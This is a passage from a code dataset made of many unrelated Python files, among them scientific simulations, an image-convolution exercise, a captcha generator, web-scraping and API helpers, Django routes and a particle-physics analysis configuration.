d2.outcomes)\n\ndef test_join():\n \"\"\" Test join \"\"\"\n outcomes = ['00', '01', '10', '11']\n pmf = [1/4]*4\n d = Distribution(outcomes, pmf)\n d2 = join(d, [[0], [1]])\n 
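# Added note: join() relabels the induced joint outcomes as integer indices, so the four equally likely pairs '00'..'11' appear as outcomes 0..3 in the assertion below.\n    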
assert_equal(d2.outcomes, (0, 1, 2, 3))\n npt.assert_allclose(d2.pmf, d.pmf)\n\ndef test_meet():\n \"\"\" Test meet \"\"\"\n outcomes = ['00', '01', '10', '11']\n pmf = [1/4]*4\n d = Distribution(outcomes, pmf)\n d2 = meet(d, [[0], [1]])\n assert_equal(d2.outcomes, (0,))\n npt.assert_allclose(d2.pmf, [1])\n\ndef test_insert_join():\n \"\"\" Test insert_join \"\"\"\n outcomes = ['00', '01', '10', '11']\n pmf = [1/4]*4\n d = Distribution(outcomes, pmf)\n assert_raises(IndexError, insert_join, d, 5, [[0], [1]])\n\n for idx in range(d.outcome_length()):\n d2 = insert_join(d, idx, [[0], [1]])\n m = d2.marginal([idx])\n npt.assert_allclose(d2.pmf, m.pmf)\n","sub_path":"dit/algorithms/tests/test_lattice.py","file_name":"test_lattice.py","file_ext":"py","file_size_in_byte":2871,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"466923267","text":"#!/usr/bin/python3\n\nfrom collections import namedtuple\nimport re\n\nwith open('input.txt', 'r') as f:\n lines = f.readlines()\n\nPoint = namedtuple('Point', [ 'col', 'row' ])\n\nclass Array:\n\n def __init__(self, cols, rows):\n self.__cols = cols\n self.__rows = rows\n self.__data = [ [False]*cols for i in range(rows) ]\n\n def count(self):\n total = 0\n for col in range(self.__cols):\n for row in range(self.__rows):\n if self.__data[row][col]:\n total+=1\n return total\n\n def set(self,col,row):\n #print(\"set\", row, col)\n self.__data[row][col] = True\n\n def clear(self,col,row):\n #print(\"clr\", row, col)\n self.__data[row][col] = False\n\n def toggle(self,col,row):\n #print(\"tgl\", row, col)\n self.__data[row][col] = not self.__data[row][col]\n\n def apply(self,op,p1,p2):\n if op == 'turn on':\n fn = Array.set\n elif op == 'turn off':\n fn = Array.clear\n elif op == 'toggle':\n fn = Array.toggle\n else:\n raise Exception(\"invalid op '%s'\" % op)\n\n for col in range(p1.col, p2.col+1):\n for row in range(p1.row, p2.row+1):\n fn(self,col,row)\n\narray = Array(1000, 1000)\n\nfor line in lines:\n m = re.match('(turn on|turn off|toggle) (\\d+),(\\d+) through (\\d+),(\\d+)', line)\n if m:\n p1 = Point(int(m.group(2)), int(m.group(3)))\n p2 = Point(int(m.group(4)), int(m.group(5)))\n array.apply(m.group(1), p1, p2)\n else:\n raise Exception(\"failed parsing '%s'\" % line.rtrim())\n\n\nprint(array.count())\n","sub_path":"2015/6/6-1.py","file_name":"6-1.py","file_ext":"py","file_size_in_byte":1649,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"511707610","text":"#This function contains an implementation of the \r\n#Hodgkin-Huxley model\r\n#and the FitzHugh-Nagumo model\r\nimport time;\r\nimport pylab;\r\nimport numpy as np\r\n\r\n#External current function (for pacing)\r\n#It could be used for sensor input later on\r\ndef readExternal():\r\n return 0; \r\n\r\ndef fitzhughNagumo(t_end):\r\n #time step\r\n tstep = 0.01;\r\n #initial values of v and w\r\n v = 2.0; \r\n w = 0.0; \r\n I_ext = 0; \r\n tc = 1.0;\r\n #parameters\r\n a = 1; b = 0.0; c = 0.8;\r\n eps = 10;\r\n #time scale used to shift the model\r\n t_sc = 10; \r\n #end of parameters\r\n inc = 0; \r\n vs = []; \r\n ts = [];\r\n t_now = 0; \r\n ts.append(t_now); \r\n vs.append(v); \r\n while(t_now < t_end):\r\n #calculate the rate of change\r\n I_ext = readExternal();\r\n dv = t_sc*(v - v**3/3 - w + I_ext)\r\n dw = t_sc*(1.0/eps*(a*v+b-c*w));\r\n #calculate the value of v based on the rate of change\r\n v = v+tstep*dv; \r\n w = w+tstep*dw; \r\n t_now = t_now+tstep;\r\n \r\n 
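# Added note: the update above is an explicit (forward) Euler step, so tstep must stay small relative to the fastest dynamics for the integration to remain stable; the trajectory is recorded below for plotting.\r\n        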
ts.append(t_now); \r\n vs.append(v);\r\n \r\n pylab.plot(ts, vs);\r\n pylab.xlabel('time in seconds');\r\n pylab.ylabel('Voltage in Volts'); \r\n \r\n\r\ndef HH_model(t_end):\r\n #parameters of the HH model\r\n ENa = 115; gNa = 120; \r\n EK = -12; gK = 36; \r\n EL = 10.6; gL = 0.3; \r\n C = 1;\r\n tstep = 0.01; \r\n t_sc = 10;\r\n v=0; m=0; n=0; h=0; \r\n vs = [];\r\n vs.append(v); \r\n t_now = 0; \r\n ts = []; \r\n ts.append(t_now); \r\n while(t_now < t_end):\r\n INa = gNa*m**3*h*(v-ENa);\r\n IK = gK*n**4*(v-EK);\r\n IL = gL*(v-EL);\r\n I_ext = readExternal(); \r\n \r\n dv = -1.0/C*(INa+IK+IL+I_ext);\r\n dv = dv*t_sc;\r\n\r\n \r\n a_n = (0.1-0.01*v)/(np.exp(1-0.1*v)-1);\r\n b_n = (0.125)*np.exp(-v/80); \r\n \r\n a_m = (2.5-0.1*v)/(np.exp(2.5-0.1*v)-1); \r\n b_m = 4*np.exp(-v/18);\r\n \r\n a_h = (0.07*np.exp(-v/20));\r\n b_h = 1/(np.exp(3-0.1*v)+1); \r\n \r\n dm = a_m*(1-m)-b_m*m;\r\n dm = dm*t_sc;\r\n \r\n dn = a_n*(1-n)-b_n*n; \r\n dn = dn*t_sc;\r\n \r\n dh = a_h*(1-h)-b_h*h; \r\n dh = dh*t_sc;\r\n \r\n v = v+tstep*dv; \r\n m = m+tstep*dm; \r\n n = n+tstep*dn; \r\n h = h+tstep*dh; \r\n \r\n t_now = t_now+tstep;\r\n ts.append(t_now);\r\n vs.append(v); \r\n \r\n pylab.plot(ts,vs); \r\n\r\n#Run the HH model \r\npylab.figure(1); \r\nfitzhughNagumo(10);\r\npylab.figure(2);\r\nHH_model(10);","sub_path":"Python/Mechanical Fireflies/FitzhughNagumo_Firefly.py","file_name":"FitzhughNagumo_Firefly.py","file_ext":"py","file_size_in_byte":2548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"637184728","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\n生成校验码\n\"\"\"\n\nimport os\nimport random\n\nfrom PIL import Image, ImageFont, ImageDraw\n\n_letter_cases = \"abcdefghjkmnpqrstuvwxy\" # 去除可能干扰的i,l,o,z\n_upper_cases = _letter_cases.upper() # 大写字母\n_numbers = ''.join(map(str, range(3, 10))) # 数字\ninit_chars = ''.join((_letter_cases, _upper_cases, _numbers))\n\ncurrentPath = os.path.split(os.path.realpath(__file__))[0]\nfontType = os.path.join(currentPath, 'OpenSans-Bold.ttf')\n\n\ndef create_validate_code(size=(80, 30),\n chars=init_chars,\n img_type=\"PNG\",\n mode=\"RGB\",\n bg_color=(255, 255, 255),\n fg_color=(0, 0, 255),\n font_size=18,\n font_type=fontType,\n length=4,\n draw_lines=True,\n n_line=(1, 2),\n draw_points=True,\n point_chance=2):\n width, height = size # 图像的宽,高\n img = Image.new(mode, size, bg_color) # 创建新图像\n draw = ImageDraw.Draw(img)\n c_chars = random.sample(chars, length)\n strs = ' %s ' % ' '.join(c_chars) # 每个字符前后以空格隔开\n\n font = ImageFont.truetype(font_type, font_size)\n font_width, font_height = font.getsize(strs)\n\n draw.text(((width - font_width) / 3, (height - font_height) / 3), strs, font=font, fill=fg_color)\n\n img.save(os.path.join(currentPath, 'validate.png'), 'PNG') # 存储图片\n\n\nif __name__ == '__main__':\n create_validate_code()\n","sub_path":"gxz1989611/Q0010/generate_captcha.py","file_name":"generate_captcha.py","file_ext":"py","file_size_in_byte":1651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"467586095","text":"from bs4 import BeautifulSoup\nimport requests\n\nurl = \"http://example.com/\"\n\nresponse = requests.get(url)\n\n\ndata = response.text\n\nsoup = BeautifulSoup(data, 'html.parser')\n\ntags = soup.find_all('a')\n\nfor tag in tags:\n print(tag.get('href'))\n\nfor tag in tags:\n print(tag)\n\n# Test easy parser","sub_path":"example 1.py","file_name":"example 
1.py","file_ext":"py","file_size_in_byte":295,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"450407193","text":"from pybot import robot\nimport sys\nimport getopt\n\n\n@robot.hear(r\"^badger$\")\ndef badger(res):\n res.send(\"thangs\")\n\n\n@robot.respond(\"say hi\")\ndef say_hi(res):\n res.reply(\"hello\")\n\n\n@robot.hear(r\"open the (.*?) doors\")\ndef open_pod_bay_doors(res):\n door_type = res.match.group(1)\n if door_type == 'pod bay':\n res.reply(\"I'm afraid I can't let you do that\")\n else:\n res.reply(\"Opening {} doors\".format(door_type))\n\n\n@robot.on('connected')\ndef on_connected(data):\n robot.send('shell', \"I am here world\")\n\n\ndef usage():\n print(\"-a adapter\")\n print(\"-h help\")\n\n\nif __name__ == '__main__':\n useful_args = sys.argv[1:]\n try:\n opts, args = getopt.getopt(useful_args, \"a:h\", [\"adapter=\", \"help\"])\n except getopt.GetoptError:\n usage()\n sys.exit(2)\n\n for opt, arg in opts:\n if opt in (\"-h\", \"--help\"):\n usage()\n sys.exit()\n elif opt in (\"-a\", \"--adapter\"):\n robot.load_adapter(arg)\n\n robot.run()\n","sub_path":"sample.py","file_name":"sample.py","file_ext":"py","file_size_in_byte":1004,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"219626144","text":"import numpy as np\r\nimport numpy.random as rd\r\nimport tensorflow as tf\r\ndef numpy_open(path) :\r\n #파일 열기\r\n data = np.genfromtxt(path)\r\n return data\r\n\r\ndef Sigmoid(a):\r\n return (1 / (1 + np.exp(-a)))\r\n\r\ndef Relu(b):\r\n return np.maximum(0,b)\r\ndef SoftMax(s):\r\n e_x = np.exp(x - np.max(x))\r\n return e_x / e_x.sum()\r\npath = './training.dat'\r\ndata = numpy_open(path)\r\nW1 = 2*rd.rand(4,4)-1\r\nW2 = 2*rd.rand(4,3)-1\r\nW3 = 2*rd.rand(3,3)-1\r\n\r\nrate = 0.7\r\nfor i in range(75) :\r\n x = data[i]\r\n print(\"x : \",x)\r\n if 0 <= i < 25 :\r\n d = [1,0,0]\r\n if 25 <= i <50 :\r\n d = [0,1,0]\r\n if 50 <= i <75:\r\n d = [ 0,0,1]\r\n\r\n v1 = np.matmul(x,W1)\r\n y1 = Relu(v1)\r\n v2 = np.matmul(y1,W2)\r\n y2 = Relu(v2)\r\n print(\"y2 :\",y2)\r\n \r\n v3 = np.matmul(y2,W3) # 1,3 3 * 3\r\n y3 = SoftMax(v3)\r\n print(\"y3 : \",y3)\r\n \r\n\r\n \r\n","sub_path":"딥러닝/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":998,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"640444975","text":"import numpy as np\nimport cv2\n\ncap = cv2.VideoCapture(0)\n# frame = cv2.imread('mix.jpg')\n\nwhile True:\n ret, frame = cap.read()\n\n filtered = cv2.cvtColor(np.copy(frame), cv2.COLOR_BGR2HSV)\n mask = cv2.inRange(filtered, (0,0,0), (124,255,100))\n\n gray = cv2.cvtColor(np.copy(frame), cv2.COLOR_BGR2GRAY)\n edges = cv2.Canny(gray, 30, 75, L2gradient=True)\n\n im2, contours, hierarchy = cv2.findContours(edges, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n\n cv2.drawContours(frame, contours, -1, (0,255,0), 3)\n\n for c in contours:\n # rect = cv2.minAreaRect(c)\n # box = cv2.boxPoints(rect)\n # box = np.int0(box)\n hull = cv2.convexHull(c)\n # cv2.drawContours(frame, [hull], 0, (255,0,0), 2)\n\n area = cv2.contourArea(hull)\n perim = cv2.arcLength(hull,True)\n if area > 800 and perim > 80 and area < 2600:\n ratio = area/((perim/4)**2)\n if ratio>0.9 and ratio<1.2:\n cv2.drawContours(frame, [c], 0, (0,0,255), 2)\n\n outp = cv2.cvtColor(gray, cv2.COLOR_GRAY2BGR)\n\n cv2.imshow('Rubik\\'s', np.hstack((frame,outp)))\n cv2.imshow('Contours', edges)\n cv2.imshow('Mask', mask)\n\n key = cv2.waitKey(1) 
& 0xFF\n if key == 27:\n break","sub_path":"Rubik's Cube Solver/Python/misc/contour_detect.py","file_name":"contour_detect.py","file_ext":"py","file_size_in_byte":1241,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"316234357","text":"#!/usr/bin/env python2.7\n# -*- coding: utf-8 -*-\n\nimport codecs\nimport json\nimport re\nimport urllib\n\nwith codecs.open('download/package-jsons', encoding='utf-8') as in_file, \\\n codecs.open('output.txt', mode='wb', encoding='utf-8') as out_file:\n for package_json in in_file:\n package_dict = json.loads(package_json)\n package_info = package_dict['info']\n\n # Build abstract\n abstract_lines = []\n summary = package_info['summary']\n if not summary or summary == 'UNKNOWN':\n continue\n abstract_lines.append(re.sub(r'\\s', ' ', summary, flags=re.MULTILINE | re.UNICODE))\n #abstract_lines.append('Downloads in the last month: %s' % package_info['downloads']['last_month'])\n\n for classifier in package_info['classifiers']:\n if classifier.startswith('Development Status'):\n abstract_lines.append('Development status: %s' % classifier.split(' - ')[-1])\n break\n\n abstract_lines.append(\"
pip install \" + package_info['name'] + \"
\")\n\n official_site = ''\n # check for real links. We can get stuff like 'unknown', '404' in here\n if package_info['home_page'] and re.search(r'www.', package_info['home_page']):\n official_site = '[' + package_info['home_page'] + ' Official site]\\\\\\\\n'\n\n out_file.write('\\t'.join([\n package_info['name'], # Title\n 'A', # Article type\n '', # No redirect\n '', # Other uses (ignored)\n '', # No categories\n '', # References (ignored)\n '', # No related topics\n '', # Further reading (ignored)\n official_site, # External links (ignored)\n '', # Disambiguation (ignored)\n '', # No images\n '
'.join(abstract_lines),\n urllib.quote(package_info['package_url'], safe='/:'), # Source url\n ]))\n out_file.write('\\n')\n","sub_path":"lib/fathead/py_pi/parse.py","file_name":"parse.py","file_ext":"py","file_size_in_byte":1981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"84109565","text":"import matplotlib.pyplot as plt\n\n\ndef add_labels(x, y, labels, ax=None):\n \"\"\"Ajoute les étiquettes `labels` aux endroits définis par `x` et `y`.\"\"\"\n\n if ax is None:\n ax = plt.gca()\n for x, y, label in zip(x, y, labels):\n ax.annotate(\n label, [x, y], xytext=(10, -5), textcoords=\"offset points\",\n )\n\n return ax\n","sub_path":"td/TP03_Representation_euclidienne_des_donnees-corrige/src/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"149599596","text":"import json\nfrom time import time, sleep\n\nimport aiohttp\nimport asyncio\nimport requests as rq\nfrom dotmap import DotMap\n\nfrom utils.helperutils import HelperUtils\nfrom utils.networkutils import NetworkUtils\n\n\nclass HubspotLoader:\n def __init__(self):\n utils = HelperUtils()\n self.networkutils = NetworkUtils()\n self.hubspot_config = utils.get_hubspot_config()\n self.auth_token = utils.get_hubspot_token()\n self.host = f\"{self.hubspot_config['host']}\"\n self.endpoint = f\"{self.hubspot_config['contact_deals_endpoint']}\"\n self.association = f\"{self.hubspot_config['association']}\"\n self.limit = f\"{self.hubspot_config['limit']}\"\n self.company_deals_urls = []\n self.requests_per_second = self.hubspot_config['requests_per_second']\n\n def add_company_deals_urls(self, company_id, properties):\n query_params = [\n f\"includeAssociations={self.association}\",\n f\"properties={properties}\",\n f\"limit={self.limit}\",\n f\"hapikey={self.auth_token}\"\n ]\n request_url = f\"{self.host}{self.endpoint}/{company_id}/paged?{'&'.join(query_params)}\"\n\n self.company_deals_urls.append(request_url)\n\n def get_company_deals_async(self):\n return self.networkutils.get_response(self.company_deals_urls, self.requests_per_second)\n\n def get_company_deals(self, request_url):\n response = rq.get(request_url)\n response_body = DotMap(json.loads(response.text))\n return response_body.deals\n\n def get_company_deal_urls(self):\n return self.company_deals_urls\n","sub_path":"hubspot/hubspot_loader.py","file_name":"hubspot_loader.py","file_ext":"py","file_size_in_byte":1612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"7658252","text":"import matplotlib\nimport numpy as np\nfrom scipy import ndimage\nmatplotlib.use('TkAgg')\n\nimport matplotlib.pyplot as plt\n\nimport imageio\n\n\nnp.set_printoptions(precision=1,linewidth=5000)\n\n\n\ndef get_simple_images(choix):\n\n img1=None\n img2=None\n if choix==0:\n img1=ndimage.imread(\"image/gamma_fin1.gif\")[:,:,0]\n img2 = ndimage.imread(\"image/gamma_fin1.gif\")[:,:,0]\n elif choix == 1:\n img1 = ndimage.imread(\"image/gamma_grand.gif\")[:, :, 0]\n img2 = ndimage.imread(\"image/gamma_petit.gif\")[:, :, 0]\n elif choix==2:\n img1 = ndimage.imread(\"image/grand_triangle.gif\")[:, :, 0]\n img2 = ndimage.imread(\"image/petit_triangle.gif\")[:, :, 0]\n elif choix==3:\n img1 = np.ones((3,3))\n img2= np.ones((2,2))\n\n elif choix==4:\n img1 = ndimage.imread(\"image/king.gif\")[:, :, 0]\n img2 = ndimage.imread(\"image/translated.gif\")[:, :, 0]\n \"\"\"que 
fait-t-on subir à nos images ci-dessous ? \"\"\"\n img1 = 255 - img1 # type:np.ndarray\n img2 = 255 - img2 # type:np.ndarray\n\n elif choix == 5: #idem qu'avant, mais en inversant l'ordre des images\n img1 = ndimage.imread(\"image/translated.gif\")[:, :, 0]\n img2 = ndimage.imread(\"image/king.gif\")[:, :, 0]\n \"\"\"que fait-t-on subir à nos images ci-dessous ? \"\"\"\n img1 = 255 - img1 # type:np.ndarray\n img2 = 255 - img2 # type:np.ndarray\n\n\n elif choix == 6:\n img1 = ndimage.imread(\"image/lena/lena_256_NB.png\")\n img2 = ndimage.imread(\"image/lena/translation1.png\")[:,:,0]\n\n print( img1.shape)\n print(img2.shape)\n\n\n elif choix == 7:\n img1 = ndimage.imread(\"image/lena/translation1.png\")\n img2 = ndimage.imread(\"image/lena/translation1.png\")[:, :, 0]\n\n print(img1.shape)\n print(img2.shape)\n\n\n\n return img1.astype(np.float32),img2.astype(np.float32)\n\n\n\ndef step0():\n img1,img2=get_simple_images(3)\n plt.subplot(1,2,1)\n plt.imshow(img1)\n plt.subplot(1,2,2)\n plt.imshow(img2)\n plt.show()\n\n\n\ndef wrapping_shape(img1:np.ndarray, img2:np.ndarray):\n if len(img1.shape) != 2 or len(img1.shape) != 2: raise ValueError(\"args must be matrix\")\n shape1 = np.array(img1.shape)\n shape2 = np.array(img2.shape)\n return np.maximum(shape1, shape2)\n\n\ndef enlargeImage(img:np.ndarray,enlargedShape)->np.ndarray:\n if len(img.shape)!=2 : raise ValueError(\"args must be matrix\")\n if img.shape[0]>enlargedShape[0] or img.shape[1]>enlargedShape[1]: raise ValueError(\"enlargedShape must be larger that the shape of the image to enlarge\")\n res=np.zeros(enlargedShape)\n res[:img.shape[0],:img.shape[1]]=img\n return res\n\n\ndef shiftAndEnlargeImage(img:np.ndarray, shift, enlargedShape=None)->np.ndarray:\n if enlargedShape is None : enlargedShape=(img.shape[0]+shift[0],img.shape[1]+shift[1])\n res=np.zeros(enlargedShape)\n res[shift[0]:img.shape[0]+shift[0],shift[1]:img.shape[1]+shift[1]]=img\n return res\n\n\n\n\ndef step1():\n img1,img2=get_simple_images(0)\n wrap=wrapping_shape(img1,img2)\n\n plt.subplot(2,2,1)\n plt.title('Enlarge')\n plt.imshow(enlargeImage(img1, wrap),vmin=100, vmax=150)\n plt.subplot(2,2,2)\n plt.title('Wrap*2')\n im=enlargeImage(img1,wrap * 2)\n plt.imshow(im,vmin=100, vmax=150)\n plt.subplot(2, 2, 3)\n plt.title('ShEn 2020')\n plt.imshow(shiftAndEnlargeImage(img1, (20, 20)),vmin=100, vmax=150)\n plt.subplot(2, 2, 4)\n plt.title('ShEn 3010')\n plt.imshow(shiftAndEnlargeImage(img1, (30, 10), enlargedShape=wrap * 2),vmin=100, vmax=150)\n plt.show()\n\n\"\"\"\nQuelle critique peut-on faire des sorties précédentes ?\nAméliorez-les en précisant l'échelle des couleurs :\n plt.imshow(img,vmin=..., vmax=...)\n\"\"\"\n\n\n\n\"\"\"the convolution of the two images, with shape: max(img1.shape[0],img2.shape[0]), max(img1.shape[1],img2.shape[1])\"\"\"\ndef convolution_rapide_2d(img1:np.ndarray, img2:np.ndarray,isCircular:bool,isAnti:bool)->np.ndarray:\n\n wrap_shape=wrapping_shape(img1,img2)\n if not isCircular: wrap_shape*=2\n\n img1=enlargeImage(img1, wrap_shape)\n img2=enlargeImage(img2, wrap_shape)\n\n if isAnti:img1=img1[::-1,::-1]\n\n fft1=np.fft.fft2(img1)\n fft2=np.fft.fft2(img2)\n preRes=np.real(np.fft.ifft2(fft1*fft2))\n\n if isAnti :return preRes[::-1,::-1]\n else : return preRes\n\n\n\n\n\"\"\" Pour tester, attention, elle ne calcule que les décalages positifs\"\"\"\ndef anti_convolution_lente2D(img1, img2):\n\n res=np.zeros(img1.shape)\n for x in range(0,img1.shape[0]):\n for y in range(0, img1.shape[1]):\n shift2=shiftAndEnlargeImage(img2, (x, y))\n 
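# Added note: this is the direct O(N^4) reference -- shift img2 by (x, y), zero-pad both images to a common shape, and sum the pointwise product; it only covers positive shifts, as the docstring above warns, and serves to sanity-check convolution_rapide_2d.\n            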
wrap=wrapping_shape(img1,shift2)\n res[x,y]=np.sum(enlargeImage(img1,wrap)*enlargeImage(shift2,wrap))\n\n return res\n\n\n\ndef step3():\n img1, img2 = get_simple_images(1)\n print(\"lente\\n\",np.round(anti_convolution_lente2D(img1, img2),1))\n print(\"rapide\\n\",np.round( convolution_rapide_2d(img1, img2,False,True),1))\n\n\n\n\"\"\" comparons les différents type de convolutions.\nEssayez d'interprétez les résultats. Les convolutions de \"gamma\" sont les plus faciles à interpréter à mon avis \"\"\"\ndef step4():\n \"\"\"\"\"\"\n \"\"\"avec 0, c'est les gamma fin\"\"\"\n img1, img2 = get_simple_images(7)\n plt.subplot(3, 2, 1)\n plt.imshow(img1)\n plt.title(\"img1\")\n plt.subplot(3, 2, 2)\n plt.imshow(img2)\n plt.title(\"img2\")\n plt.subplot(3, 2, 3)\n plt.imshow(convolution_rapide_2d(img1, img2,False,False))\n plt.title(\"convolution\")\n plt.subplot(3, 2, 4)\n plt.imshow(convolution_rapide_2d(img1, img2,True,False))\n plt.title(\"convolution circulaire\")\n plt.subplot(3, 2, 5)\n plt.imshow(convolution_rapide_2d(img1, img2,False,True))\n plt.title(\"anti-convolution\")\n plt.subplot(3, 2, 6)\n plt.imshow(convolution_rapide_2d(img1, img2,True,True ))\n plt.title(\"anti-convolution circulaire\")\n plt.legend()\n plt.show()\n\n\n\n\ndef step5():\n\n img1, img2 = get_simple_images(2) #ça va planter avec le choix 4 notamment\n anti=convolution_rapide_2d(img1, img2,False,True)\n\n\n wrap=wrapping_shape(img1,img2)\n\n print(wrap*2,np.prod(wrap*2),np.argmax(anti))\n\n shift= list(np.unravel_index(np.argmax(anti),wrap*2)) #le list: pour le warning\n\n somme=enlargeImage(img1,wrap*2)+shiftAndEnlargeImage(img2,shift,wrap*2)\n plt.subplot(131)\n plt.imshow(img1)\n plt.subplot(132)\n plt.imshow(img2)\n plt.subplot(133)\n plt.imshow(somme)\n plt.show()\n\n\n\"\"\"\ntravail :\n\nModifiez le dernier step pour qu'il puisse caller 2 images quelque soit leur position relative.\nnotamment\n img1, img2 = getImages(4)\ndevrait fonctionner.\nAttention, il y a 4 sortes de décalages possibles (2 décalages possibles pour les abscisses, 2 décalages possibles pour les ordonnées).\nVous trouverez peut-être un moyen astucieux pour traiter les 4 cas d'un seul coup. Sinon traitez les 4 cas.\n\n\"\"\"\n\n\nif __name__==\"__main__\":\n step1()\n","sub_path":"Signals/tp11/C_decal2d.py","file_name":"C_decal2d.py","file_ext":"py","file_size_in_byte":6897,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"647611313","text":"from django.conf.urls import url\nfrom . 
import views\n\napp_name = \"inscription\"\nurlpatterns = [\n url(r'^$', views.index, name='index'),\n url(r'^merci/$', views.ContactMerciView.as_view(), name=\"contact_merci\"),\n url(r'^inscription/$', views.inscription, name=\"inscription\"),\n url(r'^inscription/attente$', views.InscriptionAttenteView.as_view(), name=\"inscription_attente\"),\n url(r'^inscription/annulation$', views.InscriptionAnnulationView.as_view(), name=\"inscription_annulation\"),\n url(r'^inscription/decharge$', views.InscriptionDechargeView.as_view(), name=\"inscription_decharge\"),\n url(r'^inscription/paiement$', views.InscriptionPaiementView.as_view(), name=\"inscription_paiement\"),\n url(r'^inscription/merci$', views.InscriptionMerciView.as_view(), name=\"inscription_merci\"),\n #pour la verification de Google Search Console (webmaster tools)\n url(r'^google64b73e3e98e79ca8.html$', views.GoogleSearchConsoleView.as_view(), name=\"google_verification\"),\n\n]","sub_path":"inscription/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"574732564","text":"from os import environ\nfrom GaudiKernel.SystemOfUnits import *\nfrom Gaudi.Configuration import *\nfrom Configurables import GaudiSequencer, CombineParticles\nfrom Configurables import DecayTreeTuple, EventTuple, TupleToolTrigger, TupleToolTISTOS,FilterDesktop, MCDecayTreeTuple,PrintMCTree\nfrom Configurables import BackgroundCategory, TupleToolDecay, TupleToolVtxIsoln,TupleToolPid,EventCountHisto,TupleToolRecoStats\nfrom Configurables import LoKi__Hybrid__TupleTool, TupleToolVeto\n# Unit\nSeqPhys = GaudiSequencer(\"SeqPhys\")\n\nmct = MCDecayTreeTuple('mct')\nmct.Decay = \"gamma\"\nmct.Branches = {\n \"gamma\" :\"gamma\" ,\n\t}\nmctB = MCDecayTreeTuple('mctB')\nmctB.Decay = \"[B0]CC\"\nmctB.Branches = {\n \"B0\" :\"[B0]CC\" ,\n }\n#mct = MCDecayTreeTuple('mct')\n#mct.Decay = \"[Lambda_c+ => ^p+ ^K- ^pi+]CC\"\n#mct.Branches = {\n# \"Lc\" :\"[Lambda_c+ => p+ K- pi+ ]CC\" ,\n# \"Lcp\":\"[Lambda_c+ => ^p+ K- pi+]CC\" ,\n# \"LcK\":\"[Lambda_c+ => p+ ^K- pi+]CC\" ,\n# \"LcH\":\"[Lambda_c+ => p+ K- ^pi+]CC\" ,\n# }\n#mct = MCDecayTreeTuple('mct')\n#mct.Decay = \"[D0 => ^K- ^pi+]CC\"\n#mct.Branches = {\n# \"Lc\" :\"[D0 => K- pi+]CC\" ,\n# \"LcK\":\"[D0 => ^K- pi+]CC\" ,\n# \"LcH\":\"[D0 => K- ^pi+]CC\" ,\n# }\ndef doIt():\n \"\"\"\n specific post-config action for (x)GEN-files \n \"\"\"\n extension = \"xgen\"\n ext = extension.upper()\n\n from Configurables import DataOnDemandSvc\n dod = DataOnDemandSvc ()\n from copy import deepcopy \n algs = deepcopy ( dod.AlgMap ) \n bad = set() \n for key in algs :\n if 0 <= key.find ( 'Rec' ) : bad.add ( key )\n elif 0 <= key.find ( 'Raw' ) : bad.add ( key )\n elif 0 <= key.find ( 'DAQ' ) : bad.add ( key )\n elif 0 <= key.find ( 'Trigger' ) : bad.add ( key )\n elif 0 <= key.find ( 'Phys' ) : bad.add ( key )\n elif 0 <= key.find ( 'Prev/' ) : bad.add ( key )\n elif 0 <= key.find ( 'Next/' ) : bad.add ( key )\n elif 0 <= key.find ( '/MC/' ) and 'GEN' == ext : bad.add ( key )\n for b in bad :\n del algs[b]\n\n dod.AlgMap = algs\n\n from Configurables import EventClockSvc, CondDB \n EventClockSvc ( EventTimeDecoder = \"FakeEventTime\" )\n CondDB ( IgnoreHeartBeat = True )\n\nappendPostConfigAction( doIt)\nmctl=[ 'MCTupleToolHierarchy', 'MCTupleToolKinematic', 'MCTupleToolPrimaries']\nmctl=[ 'MCTupleToolKinematic']\nmct.ToolList=mctl \nmctB.ToolList=mctl \n\nprintMC = PrintMCTree()\nprintMC.ParticleNames = 
[\"Lambda_c+\",\"Lambda_c~-\"]\nprintMC.ParticleNames = [\"D0\",\"D~0\"]\nprintMC.ParticleNames = [\"Xi_cc++\",\"Xi_cc~--\"]\nprintMC.ParticleNames = [\"B0\",\"B~0\"]\nprintMC.ParticleNames = [\"B+\",\"B-\"]\n\n\n\n\n########################################################################\nfrom Configurables import DaVinci\nDaVinci().EvtMax = -1\n#DaVinci().PrintFreq = 1\n#DaVinci().SkipEvents = 4 # Events to skip\nDaVinci().DataType = \"2018\"\nDaVinci().Simulation = True\n#DaVinci().DDDBtag =\"dddb-20150703\"\n#DaVinci().CondDBtag = \"sim-20150703-vc-md100\"\nname = \"B2KstGamma\"\nDaVinci().TupleFile = name+\"_Truth.root\" # Ntuple\n#DaVinci().UserAlgorithms = [printMC] \nDaVinci().UserAlgorithms = [mct,mctB] 